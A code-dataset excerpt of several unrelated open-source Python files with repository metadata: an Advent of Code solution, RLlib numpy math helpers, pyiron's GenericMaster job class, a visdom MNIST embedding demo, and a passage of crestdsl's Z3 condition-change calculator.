323c5cb2493e1057e0b3ce180a384d8ee50a6091
| 34
|
py
|
Python
|
utils/__init__.py
|
elviswf/pytorch_cv
|
a7f11f857a0c1d5e5a807aeed5e594659212fba0
|
[
"Apache-2.0"
] | 29
|
2018-05-24T12:47:23.000Z
|
2021-12-31T02:05:27.000Z
|
tools/__init__.py
|
mxguo/DriverPostureClassification
|
44b22e98e8952f9846db73177874de5c332e5cf5
|
[
"MIT"
] | null | null | null |
tools/__init__.py
|
mxguo/DriverPostureClassification
|
44b22e98e8952f9846db73177874de5c332e5cf5
|
[
"MIT"
] | 9
|
2018-05-24T13:39:42.000Z
|
2020-10-23T08:29:01.000Z
|
from .visualize import Visualizer
| 17
| 33
| 0.852941
|
9abbbb58601604ab5abba4c59ebb4be7c599e870
| 670
|
py
|
Python
|
p7.py
|
fiskenslakt/aoc-2021
|
9f59f94364b1bdab11d167fe1848d2b0266f1b3b
|
[
"MIT"
] | null | null | null |
p7.py
|
fiskenslakt/aoc-2021
|
9f59f94364b1bdab11d167fe1848d2b0266f1b3b
|
[
"MIT"
] | null | null | null |
p7.py
|
fiskenslakt/aoc-2021
|
9f59f94364b1bdab11d167fe1848d2b0266f1b3b
|
[
"MIT"
] | null | null | null |
from aocd import data, submit
# data = '16,1,2,0,4,2,7,1,2,14'
pos = [int(p) for p in data.split(',')]
best_fuel = float('inf')
best_pos = None
for h in range(min(pos), max(pos)+1):
fuel = 0
for p in pos:
fuel += abs(p - h)
if fuel < best_fuel:
best_fuel = fuel
best_pos = h
print(best_fuel, h)
# submit(best_fuel)
pos = [int(p) for p in data.split(',')]
best_fuel = float('inf')
best_pos = None
for h in range(min(pos), max(pos)+1):
fuel = 0
for p in pos:
fuel += sum(range(1, abs(p - h)+1))
if fuel < best_fuel:
best_fuel = fuel
best_pos = h
# print(best_fuel, best_pos)
submit(best_fuel)
| 19.705882
| 43
| 0.577612
|
5e6237065b82d92b71059b90b3b7dbda63337c03
| 9,814
|
py
|
Python
|
rllib/utils/numpy.py
|
kifarid/ray
|
43c97c2afb979987be82fa50048674e9b6776d5d
|
[
"Apache-2.0"
] | 3
|
2021-08-29T20:41:21.000Z
|
2022-01-31T18:47:51.000Z
|
rllib/utils/numpy.py
|
QPC-database/amazon-ray
|
55aa4cac02a412b96252aea4e8c3f177a28324a1
|
[
"Apache-2.0"
] | 64
|
2021-06-19T07:06:15.000Z
|
2022-03-26T07:13:16.000Z
|
rllib/utils/numpy.py
|
majacQ/ray
|
bc08c6cdcc7ddf4da751ca2a972defd3db509061
|
[
"Apache-2.0"
] | 1
|
2021-05-20T22:00:15.000Z
|
2021-05-20T22:00:15.000Z
|
import numpy as np
import tree # pip install dm_tree
from ray.rllib.utils.framework import try_import_tf, try_import_torch
from ray.rllib.utils.typing import TensorType, Union
tf1, tf, tfv = try_import_tf()
torch, _ = try_import_torch()
SMALL_NUMBER = 1e-6
# Some large int number. May be increased here, if needed.
LARGE_INTEGER = 100000000
# Min and Max outputs (clipped) from an NN-output layer interpreted as the
# log(x) of some x (e.g. a stddev of a normal
# distribution).
MIN_LOG_NN_OUTPUT = -5
MAX_LOG_NN_OUTPUT = 2
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return np.where(
np.abs(x) < delta,
np.power(x, 2.0) * 0.5, delta * (np.abs(x) - 0.5 * delta))
def l2_loss(x):
"""Computes half the L2 norm of a tensor (w/o the sqrt): sum(x**2) / 2
Args:
x (np.ndarray): The input tensor.
Returns:
The l2-loss output according to the above formula given `x`.
"""
return np.sum(np.square(x)) / 2.0
def sigmoid(x, derivative=False):
"""
Returns the sigmoid function applied to x.
Alternatively, can return the derivative or the sigmoid function.
Args:
x (np.ndarray): The input to the sigmoid function.
derivative (bool): Whether to return the derivative or not.
Default: False.
Returns:
np.ndarray: The sigmoid function (or its derivative) applied to x.
"""
if derivative:
return x * (1 - x)
else:
return 1 / (1 + np.exp(-x))
def softmax(x, axis=-1):
"""
Returns the softmax values for x as:
S(xi) = e^xi / SUMj(e^xj), where j goes over all elements in x.
Args:
x (np.ndarray): The input to the softmax function.
axis (int): The axis along which to softmax.
Returns:
np.ndarray: The softmax over x.
"""
# x_exp = np.maximum(np.exp(x), SMALL_NUMBER)
x_exp = np.exp(x)
# return x_exp /
# np.maximum(np.sum(x_exp, axis, keepdims=True), SMALL_NUMBER)
return np.maximum(x_exp / np.sum(x_exp, axis, keepdims=True), SMALL_NUMBER)
def relu(x, alpha=0.0):
"""
Implementation of the leaky ReLU function:
y = x * alpha if x < 0 else x
Args:
x (np.ndarray): The input values.
alpha (float): A scaling ("leak") factor to use for negative x.
Returns:
np.ndarray: The leaky ReLU output for x.
"""
return np.maximum(x, x * alpha, x)
def one_hot(x: Union[TensorType, int],
depth: int = 0,
on_value: int = 1.0,
off_value: float = 0.0):
"""
One-hot utility function for numpy.
Thanks to qianyizhang:
https://gist.github.com/qianyizhang/07ee1c15cad08afb03f5de69349efc30.
Args:
x (TensorType): The input to be one-hot encoded.
depth (int): The max. number to be one-hot encoded (size of last rank).
on_value (float): The value to use for on. Default: 1.0.
off_value (float): The value to use for off. Default: 0.0.
Returns:
np.ndarray: The one-hot encoded equivalent of the input array.
"""
# Handle simple ints properly.
if isinstance(x, int):
x = np.array(x, dtype=np.int32)
# Handle torch arrays properly.
elif torch and isinstance(x, torch.Tensor):
x = x.numpy()
# Handle bool arrays correctly.
if x.dtype == np.bool_:
x = x.astype(np.int)
depth = 2
# If depth is not given, try to infer it from the values in the array.
if depth == 0:
depth = np.max(x) + 1
assert np.max(x) < depth, \
"ERROR: The max. index of `x` ({}) is larger than depth ({})!".\
format(np.max(x), depth)
shape = x.shape
# Python 2.7 compatibility, (*shape, depth) is not allowed.
shape_list = list(shape[:])
shape_list.append(depth)
out = np.ones(shape_list) * off_value
indices = []
for i in range(x.ndim):
tiles = [1] * x.ndim
s = [1] * x.ndim
s[i] = -1
r = np.arange(shape[i]).reshape(s)
if i > 0:
tiles[i - 1] = shape[i - 1]
r = np.tile(r, tiles)
indices.append(r)
indices.append(x)
out[tuple(indices)] = on_value
return out
def fc(x, weights, biases=None, framework=None):
"""
Calculates the outputs of a fully-connected (dense) layer given
weights/biases and an input.
Args:
x (np.ndarray): The input to the dense layer.
weights (np.ndarray): The weights matrix.
biases (Optional[np.ndarray]): The biases vector. All 0s if None.
framework (Optional[str]): An optional framework hint (to figure out,
e.g. whether to transpose torch weight matrices).
Returns:
The dense layer's output.
"""
def map_(data, transpose=False):
if torch:
if isinstance(data, torch.Tensor):
data = data.cpu().detach().numpy()
if tf and tf.executing_eagerly():
if isinstance(data, tf.Variable):
data = data.numpy()
if transpose:
data = np.transpose(data)
return data
x = map_(x)
# Torch stores matrices in transpose (faster for backprop).
transpose = (framework == "torch" and (x.shape[1] != weights.shape[0]
and x.shape[1] == weights.shape[1]))
weights = map_(weights, transpose=transpose)
biases = map_(biases)
return np.matmul(x, weights) + (0.0 if biases is None else biases)
def lstm(x,
weights,
biases=None,
initial_internal_states=None,
time_major=False,
forget_bias=1.0):
"""
Calculates the outputs of an LSTM layer given weights/biases,
internal_states, and input.
Args:
x (np.ndarray): The inputs to the LSTM layer including time-rank
(0th if time-major, else 1st) and the batch-rank
(1st if time-major, else 0th).
weights (np.ndarray): The weights matrix.
biases (Optional[np.ndarray]): The biases vector. All 0s if None.
initial_internal_states (Optional[np.ndarray]): The initial internal
states to pass into the layer. All 0s if None.
time_major (bool): Whether to use time-major or not. Default: False.
forget_bias (float): Gets added to first sigmoid (forget gate) output.
Default: 1.0.
Returns:
Tuple:
- The LSTM layer's output.
- Tuple: Last (c-state, h-state).
"""
sequence_length = x.shape[0 if time_major else 1]
batch_size = x.shape[1 if time_major else 0]
units = weights.shape[1] // 4 # 4 internal layers (3x sigmoid, 1x tanh)
if initial_internal_states is None:
c_states = np.zeros(shape=(batch_size, units))
h_states = np.zeros(shape=(batch_size, units))
else:
c_states = initial_internal_states[0]
h_states = initial_internal_states[1]
# Create a placeholder for all n-time step outputs.
if time_major:
unrolled_outputs = np.zeros(shape=(sequence_length, batch_size, units))
else:
unrolled_outputs = np.zeros(shape=(batch_size, sequence_length, units))
# Push the batch 4 times through the LSTM cell and capture the outputs plus
# the final h- and c-states.
for t in range(sequence_length):
input_matrix = x[t, :, :] if time_major else x[:, t, :]
input_matrix = np.concatenate((input_matrix, h_states), axis=1)
input_matmul_matrix = np.matmul(input_matrix, weights) + biases
# Forget gate (3rd slot in tf output matrix). Add static forget bias.
sigmoid_1 = sigmoid(input_matmul_matrix[:, units * 2:units * 3] +
forget_bias)
c_states = np.multiply(c_states, sigmoid_1)
# Add gate (1st and 2nd slots in tf output matrix).
sigmoid_2 = sigmoid(input_matmul_matrix[:, 0:units])
tanh_3 = np.tanh(input_matmul_matrix[:, units:units * 2])
c_states = np.add(c_states, np.multiply(sigmoid_2, tanh_3))
# Output gate (last slot in tf output matrix).
sigmoid_4 = sigmoid(input_matmul_matrix[:, units * 3:units * 4])
h_states = np.multiply(sigmoid_4, np.tanh(c_states))
# Store this output time-slice.
if time_major:
unrolled_outputs[t, :, :] = h_states
else:
unrolled_outputs[:, t, :] = h_states
return unrolled_outputs, (c_states, h_states)
# TODO: (sven) this will replace `TorchPolicy._convert_to_non_torch_tensor()`.
def convert_to_numpy(x, reduce_floats=False):
"""Converts values in `stats` to non-Tensor numpy or python types.
Args:
stats (any): Any (possibly nested) struct, the values in which will be
converted and returned as a new struct with all torch/tf tensors
being converted to numpy types.
reduce_floats (bool): Whether to reduce all float64 data into float32
automatically.
Returns:
Any: A new struct with the same structure as `stats`, but with all
values converted to numpy arrays (on CPU).
"""
# The mapping function used to numpyize torch/tf Tensors (and move them
# to the CPU beforehand).
def mapping(item):
if torch and isinstance(item, torch.Tensor):
ret = item.cpu().item() if len(item.size()) == 0 else \
item.cpu().detach().numpy()
elif tf and isinstance(item, tf.Tensor):
assert tf.executing_eagerly()
ret = item.cpu().numpy()
else:
ret = item
if reduce_floats and isinstance(ret, np.ndarray) and \
ret.dtype == np.float64:
ret = ret.astype(np.float32)
return ret
return tree.map_structure(mapping, x)
| 33.267797
| 79
| 0.612798
|
79c05b58af237ebcea09426131cf28adb0e3e7ac
| 19,300
|
py
|
Python
|
pyiron/base/master/generic.py
|
SanderBorgmans/pyiron
|
81121b767b1d6371eb7c07be8e9301eba48aa557
|
[
"BSD-3-Clause"
] | null | null | null |
pyiron/base/master/generic.py
|
SanderBorgmans/pyiron
|
81121b767b1d6371eb7c07be8e9301eba48aa557
|
[
"BSD-3-Clause"
] | null | null | null |
pyiron/base/master/generic.py
|
SanderBorgmans/pyiron
|
81121b767b1d6371eb7c07be8e9301eba48aa557
|
[
"BSD-3-Clause"
] | 2
|
2020-03-17T17:00:08.000Z
|
2020-03-22T15:17:59.000Z
|
# coding: utf-8
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
import inspect
import textwrap
from pyiron.base.job.generic import GenericJob
"""
The GenericMaster is the template class for all meta jobs
"""
__author__ = "Jan Janssen"
__copyright__ = "Copyright 2019, Max-Planck-Institut für Eisenforschung GmbH - " \
"Computational Materials Design (CM) Department"
__version__ = "1.0"
__maintainer__ = "Jan Janssen"
__email__ = "janssen@mpie.de"
__status__ = "production"
__date__ = "Sep 1, 2017"
class GenericMaster(GenericJob):
"""
The GenericMaster is the template class for all meta jobs - meaning all jobs which contain multiple other jobs. It
defines the shared functionality of the different kind of job series.
Args:
project (ProjectHDFio): ProjectHDFio instance which points to the HDF5 file the job is stored in
job_name (str): name of the job, which has to be unique within the project
Attributes:
.. attribute:: job_name
name of the job, which has to be unique within the project
.. attribute:: status
execution status of the job, can be one of the following [initialized, appended, created, submitted,
running, aborted, collect, suspended, refresh,
busy, finished]
.. attribute:: job_id
unique id to identify the job in the pyiron database
.. attribute:: parent_id
job id of the predecessor job - the job which was executed before the current one in the current job series
.. attribute:: master_id
job id of the master job - a meta job which groups a series of jobs, which are executed either in parallel
or in serial.
.. attribute:: child_ids
list of child job ids - only meta jobs have child jobs - jobs which list the meta job as their master
.. attribute:: project
Project instance the jobs is located in
.. attribute:: project_hdf5
ProjectHDFio instance which points to the HDF5 file the job is stored in
.. attribute:: job_info_str
short string to describe the job by it is job_name and job ID - mainly used for logging
.. attribute:: working_directory
working directory of the job is executed in - outside the HDF5 file
.. attribute:: path
path to the job as a combination of absolute file system path and path within the HDF5 file.
.. attribute:: version
Version of the hamiltonian, which is also the version of the executable unless a custom executable is used.
.. attribute:: executable
Executable used to run the job - usually the path to an external executable.
.. attribute:: library_activated
For job types which offer a Python library pyiron can use the python library instead of an external
executable.
.. attribute:: server
Server object to handle the execution environment for the job.
.. attribute:: queue_id
the ID returned from the queuing system - it is most likely not the same as the job ID.
.. attribute:: logger
logger object to monitor the external execution and internal pyiron warnings.
.. attribute:: restart_file_list
list of files which are used to restart the calculation from these files.
.. attribute:: job_type
Job type object with all the available job types: ['ExampleJob', 'SerialMaster', 'ParallelMaster',
'ScriptJob', 'ListMaster']
.. attribute:: child_names
Dictionary matching the child ID to the child job name.
"""
def __init__(self, project, job_name):
super(GenericMaster, self).__init__(project, job_name=job_name)
self._job_name_lst = []
self._job_object_dict = {}
self._child_id_func = None
self._child_id_func_str = None
@property
def child_names(self):
"""
Dictionary matching the child ID to the child job name
Returns:
dict: {child_id: child job name }
"""
child_dict = {}
for child_id in self.child_ids:
child_dict[child_id] = self.project.db.get_item_by_id(child_id)["job"]
return child_dict
@property
def child_ids(self):
"""
list of child job ids - only meta jobs have child jobs - jobs which list the meta job as their master
Returns:
list: list of child job ids
"""
if self._child_id_func:
return self._child_id_func(self)
else:
return super(GenericMaster, self).child_ids
@property
def job_object_dict(self):
"""
internal cache of currently loaded jobs
Returns:
dict: Dictionary of currently loaded jobs
"""
return self._job_object_dict
def first_child_name(self):
"""
Get the name of the first child job
Returns:
str: name of the first child job
"""
return self.project.db.get_item_by_id(self.child_ids[0])['job']
def validate_ready_to_run(self):
"""
Validate that the calculation is ready to be executed. By default no generic checks are performed, but one could
check that the input information is complete or validate the consistency of the input at this point.
"""
pass
def append(self, job):
"""
Append a job to the GenericMaster - just like you would append an element to a list.
Args:
job (GenericJob): job to append
"""
if job.server.cores >= self.server.cores:
self.server.cores = job.server.cores
if job.job_name not in self._job_name_lst:
self._job_name_lst.append(job.job_name)
self._child_job_update_hdf(parent_job=self, child_job=job)
def pop(self, i=-1):
"""
Pop a job from the GenericMaster - just like you would pop an element from a list
Args:
i (int): position of the job. (Default is last element, -1.)
Returns:
GenericJob: job
"""
job_name_to_return = self._job_name_lst[i]
job_to_return = self._load_all_child_jobs(self._load_job_from_cache(job_name_to_return))
del self._job_name_lst[i]
with self.project_hdf5.open("input") as hdf5_input:
hdf5_input["job_list"] = self._job_name_lst
job_to_return.project_hdf5.remove_group()
job_to_return.project_hdf5 = self.project_hdf5.__class__(self.project, job_to_return.job_name,
h5_path='/' + job_to_return.job_name)
if isinstance(job_to_return, GenericMaster):
for sub_job in job_to_return._job_object_dict.values():
self._child_job_update_hdf(parent_job=job_to_return, child_job=sub_job)
job_to_return.status.initialized = True
return job_to_return
def move_to(self, project):
"""
Move the content of the job including the HDF5 file to a new location
Args:
project (ProjectHDFio): project to move the job to
Returns:
JobCore: JobCore object pointing to the new location.
"""
if self._job_id:
for child_id in self.child_ids:
child = self.project.load(child_id)
child.move_to(project.open(self.job_name + '_hdf5'))
super(GenericMaster, self).move_to(project)
def copy_to(self, project=None, new_job_name=None, input_only=False, new_database_entry=True):
"""
Copy the content of the job including the HDF5 file to a new location
Args:
project (ProjectHDFio): project to copy the job to
new_job_name (str): to duplicate the job within the same porject it is necessary to modify the job name
- optional
input_only (bool): [True/False] to copy only the input - default False
new_database_entry (bool): [True/False] to create a new database entry - default True
Returns:
GenericJob: GenericJob object pointing to the new location.
"""
new_generic_job = super(GenericMaster, self).copy_to(project=project, new_job_name=new_job_name,
input_only=input_only,
new_database_entry=new_database_entry)
if new_generic_job.job_id and new_database_entry and self._job_id:
for child_id in self.child_ids:
child = self.project.load(child_id)
new_child = child.copy_to(project.open(self.job_name + '_hdf5'),
new_database_entry=new_database_entry)
if new_database_entry and child.parent_id:
new_child.parent_id = new_generic_job.job_id
if new_database_entry and child.master_id:
new_child.master_id = new_generic_job.job_id
return new_generic_job
def to_hdf(self, hdf=None, group_name=None):
"""
Store the GenericMaster in an HDF5 file
Args:
hdf (ProjectHDFio): HDF5 group object - optional
group_name (str): HDF5 subgroup name - optional
"""
super(GenericMaster, self).to_hdf(hdf=hdf, group_name=group_name)
with self.project_hdf5.open("input") as hdf5_input:
hdf5_input["job_list"] = self._job_name_lst
self._to_hdf_child_function(hdf=hdf5_input)
for job in self._job_object_dict.values():
job.to_hdf()
def from_hdf(self, hdf=None, group_name=None):
"""
Restore the GenericMaster from an HDF5 file
Args:
hdf (ProjectHDFio): HDF5 group object - optional
group_name (str): HDF5 subgroup name - optional
"""
super(GenericMaster, self).from_hdf(hdf=hdf, group_name=group_name)
with self.project_hdf5.open("input") as hdf5_input:
job_list_tmp = hdf5_input["job_list"]
self._from_hdf_child_function(hdf=hdf5_input)
self._job_name_lst = job_list_tmp
def set_child_id_func(self, child_id_func):
"""
Add an external function to derive a list of child IDs - experimental feature
Args:
child_id_func (Function): Python function which returns the list of child IDs
"""
self._child_id_func = child_id_func
self.save()
self.status.finished = True
def get_child_cores(self):
"""
Calculate the currently active number of cores, by summarizing all childs which are neither finished nor
aborted.
Returns:
(int): number of cores used
"""
return sum([int(db_entry['computer'].split('#')[1]) for db_entry in
self.project.db.get_items_dict({'masterid': self.job_id})
if db_entry['status'] not in ['finished', 'aborted']])
def write_input(self):
"""
Write the input files for the external executable. This method has to be implemented in the individual
hamiltonians.
"""
raise NotImplementedError("write procedure must be defined for derived Hamilton!")
def collect_output(self):
"""
Collect the output files of the external executable and store the information in the HDF5 file. This method has
to be implemented in the individual hamiltonians.
"""
raise NotImplementedError("read procedure must be defined for derived Hamilton!")
def run_if_interactive(self):
"""
For jobs which executables are available as Python library, those can also be executed with a library call
instead of calling an external executable. This is usually faster than a single core python job.
"""
raise NotImplementedError("This function needs to be implemented in the specific class.")
def interactive_close(self):
"""
interactive close is not implemtned for MetaJobs
"""
pass
def interactive_fetch(self):
"""
interactive fetch is not implemtned for MetaJobs
"""
pass
def interactive_flush(self, path="generic", include_last_step=True):
"""
interactive flush is not implemtned for MetaJobs
"""
pass
def run_if_interactive_non_modal(self):
"""
Run if interactive non modal is not implemented for MetaJobs
"""
pass
def __len__(self):
"""
Length of the GenericMaster equal the number of childs appended.
Returns:
int: length of the GenericMaster
"""
return len(self._job_name_lst)
def __getitem__(self, item):
"""
Get/ read data from the GenericMaster
Args:
item (str, slice): path to the data or key of the data object
Returns:
dict, list, float, int: data or data object
"""
child_id_lst = self.child_ids
child_name_lst = [self.project.db.get_item_by_id(child_id)["job"] for child_id in self.child_ids]
if isinstance(item, int):
item = self._job_name_lst[item]
return self._get_item_when_str(item=item, child_id_lst=child_id_lst, child_name_lst=child_name_lst)
def __getattr__(self, item):
"""
CHeck if a job with the specific name exists
Args:
item (str): name of the job
Returns:
"""
item_from_get_item = self.__getitem__(item=item)
if item_from_get_item is not None:
return item_from_get_item
else:
raise AttributeError
def _load_all_child_jobs(self, job_to_load):
"""
Helper function to load all child jobs to memory - like it was done in the previous implementation
Args:
job_to_load (GenericJob): job to be reloaded
Returns:
GenericJob: job to be reloaded - including all the child jobs and their child jobs
"""
if isinstance(job_to_load, GenericMaster):
for sub_job_name in job_to_load._job_name_lst:
job_to_load._job_object_dict[sub_job_name] = \
self._load_all_child_jobs(job_to_load._load_job_from_cache(sub_job_name))
return job_to_load
def _load_job_from_cache(self, job_name):
"""
Helper funcction to load a job either from the _job_object_dict or from the HDF5 file
Args:
job_name (str): name of the job
Returns:
GenericJob: the reloaded job
"""
if job_name in self._job_object_dict.keys():
return self._job_object_dict[job_name]
else:
ham_obj = self.project_hdf5.create_object(class_name=self._hdf5[job_name + '/TYPE'], project=self._hdf5,
job_name=job_name)
ham_obj.from_hdf()
return ham_obj
def _to_hdf_child_function(self, hdf):
"""
Helper function to store the child function in HDF5
Args:
hdf: HDF5 file object
"""
hdf["job_list"] = self._job_name_lst
if self._child_id_func is not None:
try:
hdf["child_id_func"] = inspect.getsource(self._child_id_func)
except IOError:
hdf["child_id_func"] = self._child_id_func_str
else:
hdf["child_id_func"] = "None"
def _from_hdf_child_function(self, hdf):
"""
Helper function to load the child function from HDF5
Args:
hdf: HDF5 file object
"""
try:
child_id_func_str = hdf["child_id_func"]
except ValueError:
child_id_func_str = "None"
if child_id_func_str == "None":
self._child_id_func = None
else:
self._child_id_func_str = child_id_func_str
self._child_id_func = get_function_from_string(child_id_func_str)
def _get_item_when_str(self, item, child_id_lst, child_name_lst):
"""
Helper function for __get_item__ when item is type string
Args:
item (str):
child_id_lst (list): a list containing all child job ids
child_name_lst (list): a list containing the names of all child jobs
Returns:
anything
"""
name_lst = item.split("/")
item_obj = name_lst[0]
if item_obj in child_name_lst:
child_id = child_id_lst[child_name_lst.index(item_obj)]
if len(name_lst) > 1:
return self.project.inspect(child_id)['/'.join(name_lst[1:])]
else:
return self.project.load(child_id, convert_to_object=True)
elif item_obj in self._job_name_lst:
child = self._load_job_from_cache(job_name=item_obj)
if len(name_lst) == 1:
return child
else:
return child['/'.join(name_lst[1:])]
else:
return super(GenericMaster, self).__getitem__(item)
def _child_job_update_hdf(self, parent_job, child_job):
"""
Args:
parent_job:
child_job:
"""
child_job.project_hdf5.file_name = parent_job.project_hdf5.file_name
child_job.project_hdf5.h5_path = parent_job.project_hdf5.h5_path + '/' + child_job.job_name
if isinstance(child_job, GenericMaster):
for sub_job_name in child_job._job_name_lst:
self._child_job_update_hdf(parent_job=child_job, child_job=child_job._load_job_from_cache(sub_job_name))
parent_job.job_object_dict[child_job.job_name] = child_job
def _executable_activate_mpi(self):
"""
Internal helper function to switch the executable to MPI mode
"""
pass
def run_if_refresh(self):
"""
Internal helper function the run if refresh function is called when the job status is 'refresh'. If the job was
suspended previously, the job is going to be started again, to be continued.
"""
raise NotImplementedError('Refresh is not supported for this job type for job ' + str(self.job_id))
def _run_if_busy(self):
"""
Run if busy is not implemented for MetaJobs
"""
pass
def get_function_from_string(function_str):
"""
Convert a string of source code to a function
Args:
function_str: function source code
Returns:
function:
"""
function_dedent_str = textwrap.dedent(function_str)
exec(function_dedent_str)
return eval(function_dedent_str.split("(")[0][4:])
| 35.740741
| 120
| 0.616477
|
71e89fbffab7d66002cbb1b878f3c6054be11dee
| 1,421
|
py
|
Python
|
example/mnist-embeddings.py
|
iamsdas/visdom
|
87e6bbc1b25598251735e1a098aae8074950a82b
|
[
"Apache-2.0"
] | 8,366
|
2017-03-16T16:39:54.000Z
|
2021-01-05T11:08:15.000Z
|
example/mnist-embeddings.py
|
Pandinosaurus/visdom
|
026958a66ce743f59e8f5232e974138c76b31675
|
[
"Apache-2.0"
] | 665
|
2017-03-16T16:51:32.000Z
|
2021-01-05T02:38:57.000Z
|
example/mnist-embeddings.py
|
Pandinosaurus/visdom
|
026958a66ce743f59e8f5232e974138c76b31675
|
[
"Apache-2.0"
] | 1,120
|
2017-03-16T17:18:17.000Z
|
2021-01-04T06:57:37.000Z
|
#!/usr/bin/env python3
# Copyright 2017-present, The Visdom Authors
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import visdom
import numpy as np
from PIL import Image # type: ignore
import base64 as b64 # type: ignore
from io import BytesIO
import sys
try:
features = np.loadtxt("example/data/mnist2500_X.txt")
labels = np.loadtxt("example/data/mnist2500_labels.txt")
except OSError:
print("Unable to find files mmist2500_X.txt and mnist2500_labels.txt "
"in the example/data/ directory. Please download from "
"https://github.com/lvdmaaten/lvdmaaten.github.io/"
"blob/master/tsne/code/tsne_python.zip")
sys.exit()
vis = visdom.Visdom()
image_datas = []
for feat in features:
img_array = np.flipud(np.rot90(np.reshape(feat, (28, 28))))
im = Image.fromarray(img_array * 255)
im = im.convert('RGB')
buf = BytesIO()
im.save(buf, format='PNG')
b64encoded = b64.b64encode(buf.getvalue()).decode('utf-8')
image_datas.append(b64encoded)
def get_mnist_for_index(id):
image_data = image_datas[id]
display_data = 'data:image/png;base64,' + image_data
return "<img src='" + display_data + "' />"
vis.embeddings(features, labels, data_getter=get_mnist_for_index, data_type='html')
input('Waiting for callbacks, press enter to quit.')
| 29.604167
| 83
| 0.704433
|
df7903e7ac9195f24512f648d0859ed737a8a0f8
| 8,226
|
py
|
Python
|
crestdsl/simulation/z3conditionchangecalculator.py
|
stklik/CREST
|
7fd97c50b0c6c923e1c477105bed4f0ea032bb99
|
[
"MIT"
] | 14
|
2019-08-06T10:17:46.000Z
|
2022-03-13T12:50:59.000Z
|
crestdsl/simulation/z3conditionchangecalculator.py
|
stklik/CREST
|
7fd97c50b0c6c923e1c477105bed4f0ea032bb99
|
[
"MIT"
] | 16
|
2018-01-20T00:54:24.000Z
|
2019-07-24T15:43:42.000Z
|
crestdsl/simulation/z3conditionchangecalculator.py
|
stklik/CREST
|
7fd97c50b0c6c923e1c477105bed4f0ea032bb99
|
[
"MIT"
] | 1
|
2021-02-01T15:33:24.000Z
|
2021-02-01T15:33:24.000Z
|
import astor
import z3
from .to_z3 import Z3Converter, get_minimum_dt_of_several_anonymous
from crestdsl import sourcehelper as SH
from .epsilon import Epsilon
import logging
logger = logging.getLogger(__name__)
def get_behaviour_change_dt_from_constraintset(solver, constraints, dt, ctx=z3.main_ctx()):
times = {cs: cs.check_behaviour_change(solver, dt, ctx) for cs in constraints}
times = {cs: time for cs, time in times.items() if time is not None}
if len(times) > 0:
minimum = min(times, key=times.get)
return times[minimum], minimum.label
else:
return None, None
class ConstraintSet(object):
def __init__(self, constraints_until_condition, condition):
self.constraints_until_condition = constraints_until_condition
self.condition = condition
self.label = ""
def translate_to_context(self, ctx):
condition = self.condition.translate(ctx)
constraints = [c.translate(ctx) for c in self.constraints_until_condition]
translated = ConstraintSet(constraints, condition)
translated.label = self.label
return translated
def set_label(self, label):
self.label = label
def check_behaviour_change(self, solver, dt, ctx):
"""
Returns either a numeric (Epsilon) value, or None.
Epsilon states the time until the constraint is solvable.
"""
condition = self.condition
constraints = self.constraints_until_condition
if ctx != condition.ctx: # the wrong context, translate to the correct one
condition = self.condition.translate(ctx)
constraints = [c.translate(ctx) for c in self.constraints_until_condition]
solver.push() # initial solver point (#1)
solver.add(constraints)
solver.push() # (#2)
solver.add(condition)
solver.add(dt == 0)
check = solver.check() == z3.sat
logger.debug(f"The {self.label} is currently {check}")
solver.pop() # (#2)
""" Let's see if we can change something by just passing time """
solver.push() # new backtracking point (#3)
solver.add(dt > 0) # time needs to pass
# flip it
if check:
solver.add(z3.Not(condition)) # currently sat, check if time can make it unsat
else: # currently not sat
solver.add(condition) # check if time can make it sat
objective = solver.minimize(dt) # get the minimum
returnvalue = None
if solver.check() == z3.sat:
logger.debug(f"The condition evaluation can change though with a dt of: {objective.value()}")
logger.debug(solver.model())
# epsilonify
inf_coeff, numeric_coeff, eps_coeff = objective.lower_values()
returnvalue = Epsilon(numeric_coeff, eps_coeff)
else:
logger.debug(f"The condition evaluation cannot change by passing of time")
solver.pop() # pop the second backtracking point (#3)
solver.pop() # final pop initial solver point (#1)
return returnvalue
class Z3ConditionChangeCalculator(Z3Converter):
def __init__(self, z3_vars, entity, container, use_integer_and_real=True):
super().__init__(z3_vars, entity, container, use_integer_and_real)
# self.to_z3 = copy.deepcopy(self.__class__.to_z3)
# self.to_z3.register(list, self.to_z3_list)
# self.to_z3.register(ast.If, self.to_z3_astIf)
# self.dts = [] # remove me
# self.dts_eps = []
self.all_constraints = []
self.constraint_sets_to_check = []
def calculate_constraints(self, function):
self.to_z3(function)
return self.constraint_sets_to_check
def to_z3_list(self, obj):
""" in a list, convert every one of the parts individually"""
constraints = []
for stmt in obj:
new_constraint = self.to_z3(stmt)
if isinstance(new_constraint, str):
continue
if new_constraint is None:
continue # skip if nothing happened (e.g. for print expressions or just a comment string)
# logger.info(f"adding {new_constraint}")
if isinstance(new_constraint, list):
constraints.extend(new_constraint)
self.all_constraints.extend(new_constraint)
else:
constraints.append(new_constraint)
self.all_constraints.append(new_constraint)
return constraints
# TODO: to be fully tested
def to_z3_astIfExp(self, obj):
""" a if b else c"""
condition = self.to_z3(obj.test)
condition_type = self.resolve_type(obj.test)
condition_cast = self.cast(condition, condition_type, BOOL)
cs = ConstraintSet(self.all_constraints.copy(), condition_cast)
cs.set_label(f"If-Expression at Line #{obj.lineno}")
self.constraint_sets_to_check.append(cs)
all_constraints_backup = self.all_constraints.copy() # save the state before exploring
self.all_constraints.append(z3.And(test))
body = self.to_z3(obj.body) # explores the then-branch and creates the constraints
self.all_constraints = all_constraints_backup.copy() # reset
self.all_constraints.append(z3.Not(test)) # condition to get in here
self.all_constraints.extend(else_ins)
orelse = self.to_z3(obj.orelse)
self.all_constraints = all_constraints_backup.copy() # reset again
then_type = self.resolve_type(obj.body)
else_type = self.resolve_type(obj.orelse)
target_type = self.resolve_two_types(then_type, else_type)
ret_val = z3.If(condition_cast,
self.cast(body, then_type, target_type),
self.cast(orelse, else_type, target_type)
)
return ret_val
# TODO: to be fully tested
def to_z3_astIf(self, obj):
test = self.to_z3(obj.test)
cs = ConstraintSet(self.all_constraints.copy(), z3.And(test))
cs.set_label(f"If-Condition at Line #{obj.lineno}")
self.constraint_sets_to_check.append(cs)
all_constraints_backup = self.all_constraints.copy() # save the state before exploring
body_ins, else_ins = self.get_astIf_ins(obj)
self.all_constraints.append(test)
